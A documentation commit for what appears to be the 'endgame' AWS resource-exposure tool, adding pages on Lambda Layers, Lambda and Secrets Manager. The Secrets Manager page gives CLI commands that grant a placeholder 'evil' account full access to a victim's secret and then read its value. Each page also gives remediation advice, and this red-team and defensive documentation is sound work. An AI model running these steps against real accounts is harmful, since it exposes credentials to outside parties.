Add Secrets Manager documentation

kmcquade · kmcquade · commit 89889952260a · 2021-02-13T12:11:58.000-05:00
diff --git a/docs/risks/lambda-layers.md b/docs/risks/lambda-layers.md
@@ -0,0 +1,27 @@
+# Lambda Layers
+
+## Steps to Reproduce
+
+## Example
+
+## Exploitation
+
+## Remediation
+
+* **Trusted Accounts Only**: Ensure that Lambda Layers are only shared with trusted accounts.
+* **Ensure access is necessary**: For any trusted accounts that do have access, ensure that the access is absolutely necessary.
+* **AWS Access Analyzer**: Leverage AWS Access Analyzer to report on external access to Lambda Layers. See [the AWS Access Analyzer documentation](https://docs.aws.amazon.com/IAM/latest/UserGuide/access-analyzer-resources.html#access-analyzer-lambda) for more details.
+* **Restrict access to IAM permissions that could expose your Lambda Layers**: Tightly control access to the following IAM actions:
+  - [lambda:AddLayerVersionPermission](https://docs.aws.amazon.com/lambda/latest/dg/API_AddLayerVersionPermission.html): _Grants permission to add permissions to the resource-based policy of a version of an AWS Lambda layer_
+  - [lambda:GetLayerVersionPolicy](https://docs.aws.amazon.com/lambda/latest/dg/API_GetLayerVersionPolicy.html): _Grants permission to view the resource-based policy for a version of an AWS Lambda layer_
+  - [lambda:ListFunctions](https://docs.aws.amazon.com/lambda/latest/dg/API_ListFunctions.html): _Grants permission to retrieve a list of AWS Lambda functions, with the version-specific configuration of each function_
+  - [lambda:ListLayers](https://docs.aws.amazon.com/lambda/latest/dg/API_ListLayers.html): _Grants permission to retrieve a list of AWS Lambda layers, with details about the latest version of each layer_
+  - [lambda:ListLayerVersions](https://docs.aws.amazon.com/lambda/latest/dg/API_ListLayerVersions.html): _Grants permission to retrieve a list of versions of an AWS Lambda layer_
+  - [lambda:RemoveLayerVersionPermission](https://docs.aws.amazon.com/lambda/latest/dg/API_RemoveLayerVersionPermission.html): _Grants permission to remove a statement from the permissions policy for a version of an AWS Lambda layer_
+
+Also, consider using [Cloudsplaining](https://github.com/salesforce/cloudsplaining/#cloudsplaining) to identify violations of least privilege in IAM policies. This can help limit the IAM principals that have access to the actions that could perform Resource Exposure activities. See the example report [here](https://opensource.salesforce.com/cloudsplaining/)
+
+## References
+
+* [aws lambda add-layer-version-permission](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/lambda/add-layer-version-permission.html)
+* [Access Analyzer support for AWS Lambda Functions](https://docs.aws.amazon.com/IAM/latest/UserGuide/access-analyzer-resources.html#access-analyzer-lambda)
diff --git a/docs/risks/lambda.md b/docs/risks/lambda.md
@@ -8,17 +8,19 @@ Existing Exploitation tools such as [Pacu](https://github.com/RhinoSecurityLabs/
 
 ## Steps to Reproduce
 
-* **Option 1**: To expose the Lambda function using `endgame`:
+* **Option 1**: To expose the Lambda function using `endgame`, run the following from the victim account:
 
 ```bash
 export EVIL_PRINCIPAL=arn:aws:iam::999988887777:user/evil
+
 endgame expose --service lambda --name test-resource-exposure
 ```
 
-* **Option 2**: To expose the Lambda Function using AWS CLI:
+* **Option 2**: To expose the Lambda Function using AWS CLI, run the following from the victim account:
 
 ```bash
 export EVIL_PRINCIPAL_ACCOUNT=999988887777
+
 aws lambda add-permission \
     --function-name test-resource-exposure \
     --action lambda:* \
@@ -77,11 +79,19 @@ aws lambda invoke --function-name $VICTIM_LAMBDA
 
 ## Remediation
 
-* Ensure that cross-account Lambda functions allow access only to trusted accounts to prevent unknown function invocation requests
-* Leverage AWS Access Analyzer to report on external access to Lambda Functions. See [the AWS Access Analyzer documentation](https://docs.aws.amazon.com/IAM/latest/UserGuide/access-analyzer-resources.html#access-analyzer-lambda) for more details.
+* **Trusted Accounts Only**: Ensure that cross-account Lambda functions allow access only to trusted accounts to prevent unknown function invocation requests
+* **Ensure access is necessary**: For any trusted accounts that do have access, ensure that the access is absolutely necessary.
+* **AWS Access Analyzer**: Leverage AWS Access Analyzer to report on external access to Lambda Functions. See [the AWS Access Analyzer documentation](https://docs.aws.amazon.com/IAM/latest/UserGuide/access-analyzer-resources.html#access-analyzer-lambda) for more details.
+* **Restrict access to IAM permissions that could expose your Lambda Functions**: Tightly control access to the following IAM actions:
+  - [lambda:AddPermission](https://docs.aws.amazon.com/lambda/latest/dg/API_AddPermission.html): _Grants permission to give an AWS service or another account permission to use an AWS Lambda function_
+  - [lambda:GetPolicy](https://docs.aws.amazon.com/lambda/latest/dg/API_GetPolicy.html): _Grants permission to view the resource-based policy for an AWS Lambda function, version, or alias_
+  - [lambda:InvokeFunction](https://docs.aws.amazon.com/lambda/latest/dg/API_Invoke.html): _Grants permission to invoke an AWS Lambda function_
+  - [lambda:ListFunctions](https://docs.aws.amazon.com/lambda/latest/dg/API_ListFunctions.html): _Grants permission to retrieve a list of AWS Lambda functions, with the version-specific configuration of each function_
+  - [lambda:RemovePermission](https://docs.aws.amazon.com/lambda/latest/dg/API_RemovePermission.html): _Grants permission to revoke function-use permission from an AWS service or another account_
 
+Also, consider using [Cloudsplaining](https://github.com/salesforce/cloudsplaining/#cloudsplaining) to identify violations of least privilege in IAM policies. This can help limit the IAM principals that have access to the actions that could perform Resource Exposure. See the example report [here](https://opensource.salesforce.com/cloudsplaining/)
 
 ## References
 
-* [add-permission](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/lambda/add-permission.html)
+* [aws lambda add-permission](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/lambda/add-permission.html)
 * [Access Analyzer support for AWS Lambda Functions](https://docs.aws.amazon.com/IAM/latest/UserGuide/access-analyzer-resources.html#access-analyzer-lambda)
diff --git a/docs/risks/secretsmanager.md b/docs/risks/secretsmanager.md
@@ -1,6 +1,97 @@
 # Secrets Manager
 
+## Steps to Reproduce
+
+* **Option 1**: To expose the resource using `endgame`, run the following from the victim account:
+
+```bash
+export EVIL_PRINCIPAL=arn:aws:iam::999988887777:user/evil
+
+endgame expose --service secretsmanager --name test-resource-exposure
+```
+
+* **Option 2**: To expose the resource using AWS CLI, run the following from the victim account:
+
+```bash
+export EVIL_PRINCIPAL=arn:aws:iam::999988887777:user/evil
+export VICTIM_RESOURCE=arn:aws:secretsmanager:us-east-1:111122223333:secret/test-resource-exposure
+export EVIL_POLICY='{"Version": "2012-10-17", "Statement": [{"Sid": "AllowCurrentAccount", "Effect": "Allow", "Principal": {"AWS": "arn:aws:iam::999988887777:user/evil"}, "Action": "secretsmanager:*", "Resource": ["arn:aws:secretsmanager:us-east-1:111122223333:secret/test-resource-exposure"]}]}'
+
+aws secretsmanager put-resource-policy --secret-id --resource-policy $EVIL_POLICY
+```
+
+* To view the contents of the exposed resource policy, run the following:
+
+```bash
+aws secretsmanager get-resource-policy --secret-id test-resource-exposure
+```
+
+* Observe that the contents of the exposed resource policy match the example shown below.
+
+## Example
+
+```json
+{
+  "Version": "2012-10-17",
+  "Statement": [
+    {
+      "Sid": "Endgame",
+      "Effect": "Allow",
+      "Principal": {
+        "AWS": "arn:aws:iam::999988887777:user/evil"
+      },
+      "Action": "secretsmanager:*",
+      "Resource": [
+        "arn:aws:secretsmanager:us-east-1:111122223333:secret/test-resource-exposure"
+      ]
+    }
+  ]
+}
+```
+
+## Exploitation
+
+* Authenticate to the `evil` account (In this example, `arn:aws:iam::999988887777:user/evil`)
+
+* Run the following command in the victim account:
+
+```bash
+export VICTIM_RESOURCE=arn:aws:secretsmanager:us-east-1:111122223333:secret/test-resource-exposure
+
+aws secretsmanager get-secret-value --secret-id $VICTIM_RESOURCE 
+```
+
+* Observe that the output resembles the following:
+
+```json
+{
+  "ARN": "arn:aws:secretsmanager:us-east-1:111122223333:secret/test-resource-exposure",
+  "Name": "test-resource-exposure",
+  "VersionId": "DOGECOIN",
+  "SecretString": "{\n  \"username\":\"doge\",\n  \"password\":\"coin\"\n}\n",
+  "VersionStages": [
+    "AWSCURRENT"
+  ],
+  "CreatedDate": 1523477145.713
+}
+```
+
+## Remediation
+
+* **Trusted Accounts Only**: Ensure that Secrets Manager secrets are only shared with trusted accounts, and that the trusted accounts truly need access to the secret.
+* **Ensure access is necessary**: For any trusted accounts that do have access, ensure that the access is absolutely necessary.
+* **AWS Access Analyzer**: Leverage AWS Access Analyzer to report on external access to Secrets Manager secrets. See [the AWS Access Analyzer documentation](https://docs.aws.amazon.com/IAM/latest/UserGuide/access-analyzer-resources.html#access-analyzer-secrets-manager) for more details.
+* **Restrict access to IAM permissions that could expose your Secrets**: Tightly control access to the following IAM actions:
+  - [secretsmanager:GetResourcePolicy](https://docs.aws.amazon.com/secretsmanager/latest/apireference/API_GetResourcePolicy.html): _Enables the user to get the resource policy attached to a secret._
+  - [secretsmanager:GetSecretValue](https://docs.aws.amazon.com/secretsmanager/latest/apireference/API_GetSecretValue.html): _Enables the user to retrieve and decrypt the encrypted data._
+  - [secretsmanager:DeleteResourcePolicy](https://docs.aws.amazon.com/secretsmanager/latest/apireference/API_DeleteResourcePolicy.html): _Enables the user to delete the resource policy attached to a secret._
+  - [secretsmanager:ListSecrets](https://docs.aws.amazon.com/secretsmanager/latest/apireference/API_ListSecrets.html): _Enables the user to list the available secrets._
+  - [secretsmanager:PutResourcePolicy](https://docs.aws.amazon.com/secretsmanager/latest/apireference/API_PutResourcePolicy.html): _Enables the user to attach a resource policy to a secret._
+
+Also, consider using [Cloudsplaining](https://github.com/salesforce/cloudsplaining/#cloudsplaining) to identify violations of least privilege in IAM policies. This can help limit the IAM principals that have access to the actions that could perform Resource Exposure activities. See the example report [here](https://opensource.salesforce.com/cloudsplaining/)
 
 ## References
 
-* [put-resource-policy](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/secretsmanager/put-resource-policy.html)
+* [aws secretsmanager get-resource-policy](https://docs.aws.amazon.com/cli/latest/reference/secretsmanager/get-resource-policy.html)
+* [aws secretsmanager get-secret-value](https://docs.aws.amazon.com/cli/latest/reference/secretsmanager/get-secret-value.html)
+* [aws secretsmanager put-resource-policy](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/secretsmanager/put-resource-policy.html)
